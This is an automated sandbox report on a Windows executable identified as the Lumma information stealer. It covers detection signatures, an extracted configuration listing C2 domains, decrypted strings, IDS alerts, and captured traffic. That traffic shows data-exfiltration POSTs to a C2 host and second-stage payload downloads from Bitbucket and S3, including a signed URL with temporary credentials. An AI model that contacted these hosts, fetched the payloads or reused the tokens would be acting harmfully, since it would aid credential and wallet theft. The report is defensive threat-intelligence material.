Windows Analysis Report
fnCae9FQhg.exe

Overview

General Information

Sample name: fnCae9FQhg.exe (renamed because original name is a hash value)
Original sample name: f52f8ec2cddc2977f7f74fcfdf87d35f.exe
Analysis ID: 1580353
MD5: f52f8ec2cddc2977f7f74fcfdf87d35f
SHA1: f9b514d83e0151d96bd0cae36a3271667cd7282b
SHA256: f6e61e5caac73a84ad8840618fc8808ab4a55628a1ae8dbddcf8814ae748096a
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • fnCae9FQhg.exe (PID: 404 cmdline: "C:\Users\user\Desktop\fnCae9FQhg.exe" MD5: F52F8EC2CDDC2977F7F74FCFDF87D35F)
    • WerFault.exe (PID: 5504 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 2028 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in the C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["shapestickyr.lat", "tentabatte.lat", "slipperyloo.lat", "curverpluch.lat", "talkynicer.lat", "bashfulacid.lat", "observerfry.lat", "manyrestro.lat", "wordyfindy.lat"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
Process Memory Space: fnCae9FQhg.exe PID: 404 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: fnCae9FQhg.exe PID: 404 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: fnCae9FQhg.exe PID: 404 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: fnCae9FQhg.exe PID: 404 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T11:22:15.764205+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49713 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:17.763090+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49715 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:20.679767+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49721 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:23.057783+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49728 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:25.786477+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49739 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:28.785092+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49745 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:31.182861+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49752 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:36.142637+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49766 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:38.725809+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49773 | 185.166.143.48 | 443 | TCP
2024-12-24T11:22:41.110802+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49784 | 16.182.108.137 | 443 | TCP
2024-12-24T11:22:16.534676+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49713 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:18.546479+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49715 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:36.779245+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49766 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:16.534676+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49713 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:18.546479+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49715 | 104.21.36.201 | 443 | TCP
2024-12-24T11:22:21.742397+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49721 | 104.21.36.201 | 443 | TCP

                AV Detection

                Source: fnCae9FQhg.exe | Avira: detected
                Source: fnCae9FQhg.exe.404.1.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "tentabatte.lat", "slipperyloo.lat", "curverpluch.lat", "talkynicer.lat", "bashfulacid.lat", "observerfry.lat", "manyrestro.lat", "wordyfindy.lat"], "Build id": "LOGS11--LiveTraffic"}
                Source: fnCae9FQhg.exe | ReversingLabs: Detection: 47%
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                Source: fnCae9FQhg.exe | Joe Sandbox ML: detected
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tentabatte.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: curverpluch.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: talkynicer.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: manyrestro.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: observerfry.lat
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
                Source: 00000001.00000003.2205673920.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: LOGS11--LiveTraffic
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe | Code function: 1_2_009D58D5 CryptUnprotectData,1_2_009D58D5
                Source: fnCae9FQhg.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49721 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49745 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49752 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49766 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49773 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 16.182.108.137:443 -> 192.168.2.6:49784 version: TLS 1.2

                Networking

                Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49715 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49715 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49721 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49766 -> 104.21.36.201:443
                Source: Malware configuration extractor | URLs: shapestickyr.lat
                Source: Malware configuration extractor | URLs: tentabatte.lat
                Source: Malware configuration extractor | URLs: slipperyloo.lat
                Source: Malware configuration extractor | URLs: curverpluch.lat
                Source: Malware configuration extractor | URLs: talkynicer.lat
                Source: Malware configuration extractor | URLs: bashfulacid.lat
                Source: Malware configuration extractor | URLs: observerfry.lat
                Source: Malware configuration extractor | URLs: manyrestro.lat
                Source: Malware configuration extractor | URLs: wordyfindy.lat
                Source: Joe Sandbox View | IP Address: 185.166.143.48
                Source: Joe Sandbox View | IP Address: 104.21.36.201
                Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49739 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49745 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49766 -> 104.21.36.201:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49784 -> 16.182.108.137:443
                Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49773 -> 185.166.143.48:443
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: observerfry.lat
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 53 | Host: observerfry.lat
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=AK1OA31E9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12811 | Host: observerfry.lat
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=E8YHW9WJ7TL56BA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15093 | Host: observerfry.lat
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=481B5SIFX1Y4XKA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19951 | Host: observerfry.lat
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UNL82YRDMF7E0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1206 | Host: observerfry.lat
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=JZV35BLGTBG5B66 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 572528 | Host: observerfry.lat
                Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 88 | Host: observerfry.lat
                Source: global traffic | HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJTP5QYLD&Signature=0gsyNjuf756Vq6K0RZV6Vi%2FWImU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECMaCXVzLWVhc3QtMSJGMEQCIHqj26tV65D%2FvAw%2Bywel8AEAJF9JoNqhKOwprvxw9mEDAiAQk%2BzsgC5YLtSZ8mAOhSrQ5EbP1nlfHG9kQ3PezQ3lyiqwAgjr%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMkMl%2BRFEwMu0%2FzGyXKoQC2a%2FHBSul83NQ8p8t4txxanRAkeBJUdiNx6lf7uqSqP8BZIcvUc4n4ENPpmvQTTAo0O3VURV0yP9IvWqw0DnRXdzjKwUXK6q3TWovFckZLyzZOouJiEgWlAWVLNyQT02RcFEWT587G0QoXUTx1Lz4Of7hNeh6k9Ne92Y3iToJcaZJ6w2XyEDHnwEb9%2Fd5oPOV8NOH1SE0e0A4r%2FJyHUHEyILhq%2FoP6G28RcqDqxCuvgqOqnyGdQNmRsMK5HdHjjv2qAhhfY15lHUk5IFAPV43RovV0YK1G0h%2BsF6TaGbErDm4D016g54EiCmw49k%2BC5HSNeGcM%2BkT%2FDIgX0GK5IWQnYh6VugwipCquwY6ngFs24wzlDwNBHDL67C%2FwjBEnksCoFhSTvCORCtiVaOPIzzOlrGmKSU3Or5N2V18%2Fq20tIXooICKu8P4J2I4rdz2f%2FJD7Dq%2BF00i4OW%2FxQJ6LqwaPMAIX%2BQcsPV%2FFwo5WAIfoy4W9ygeWg5MqgxcHVu2NP6C0NWOAsSPP7l0qE173HnB8MnL9e%2BJ20gyBJBLs4rwHZCoPdcAVgc%2FS9V3Jg%3D%3D&Expires=1735036690 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | DNS traffic detected: DNS query: observerfry.lat
                Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
                Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: observerfry.lat
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49715 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49721 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49739 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49745 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49752 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.6:49766 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.6:49773 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 16.182.108.137:443 -> 192.168.2.6:49784 version: TLS 1.2

                System Summary

                Source: fnCae9FQhg.exe | Static PE information: section name:
                Source: fnCae9FQhg.exe | Static PE information: section name: .rsrc
                Source: fnCae9FQhg.exe | Static PE information: section name: .idata
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E69101_2_009E6910
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C59011_2_009C5901
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EC09E1_2_009EC09E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C397B1_2_009C397B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D81691_2_009D8169
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C61601_2_009C6160
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DE9601_2_009DE960
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F9A801_2_009F9A80
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E8ABC1_2_009E8ABC
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D9AD01_2_009D9AD0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E42D01_2_009E42D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D0ACC1_2_009D0ACC
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DE2201_2_009DE220
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F5A4F1_2_009F5A4F
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FDA4D1_2_009FDA4D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FCA401_2_009FCA40
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C42701_2_009C4270
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DEB801_2_009DEB80
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EF3801_2_009EF380
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E83D81_2_009E83D8
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C73D01_2_009C73D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CF3C01_2_009CF3C0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D8B1B1_2_009D8B1B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C93101_2_009C9310
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CAB401_2_009CAB40
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E13401_2_009E1340
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D4CA01_2_009D4CA0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E04C61_2_009E04C6
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CD4F31_2_009CD4F3
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F1CF01_2_009F1CF0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E24E01_2_009E24E0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F3C101_2_009F3C10
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FA4401_2_009FA440
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D747D1_2_009D747D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F7DA91_2_009F7DA9
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FA5D41_2_009FA5D4
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C5DC01_2_009C5DC0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FCDF01_2_009FCDF0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D051B1_2_009D051B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EC53C1_2_009EC53C
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F9D301_2_009F9D30
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E6D2E1_2_009E6D2E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D1D2B1_2_009D1D2B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009ECD5E1_2_009ECD5E
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009ECD4C1_2_009ECD4C
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FFD701_2_009FFD70
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E45601_2_009E4560
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DAEB01_2_009DAEB0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E46D01_2_009E46D0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_00A006F01_2_00A006F0
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D961B1_2_009D961B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009CF60D1_2_009CF60D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009FFE001_2_009FFE00
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009DE6301_2_009DE630
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009F86501_2_009F8650
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EFE7D1_2_009EFE7D
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E0E6C1_2_009E0E6C
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009EEE6C1_2_009EEE6C
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009C97801_2_009C9780
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E5F1B1_2_009E5F1B
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E97391_2_009E9739
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009D6F521_2_009D6F52
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeCode function: 1_2_009E77401_2_009E7740
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Code function: String function: 009C7F60 appears 40 times
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Code function: String function: 009D4C90 appears 77 times
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 2028
                Source: fnCae9FQhg.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: fnCae9FQhg.exe Static PE information: Section: ZLIB complexity 0.9995595894607843
                Source: fnCae9FQhg.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Code function: 1_2_009F2070 CoCreateInstance, 1_2_009F2070
                Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess404
                Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2ce9e3dd-6a4c-4845-b0b4-71bb2cdbfa53
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
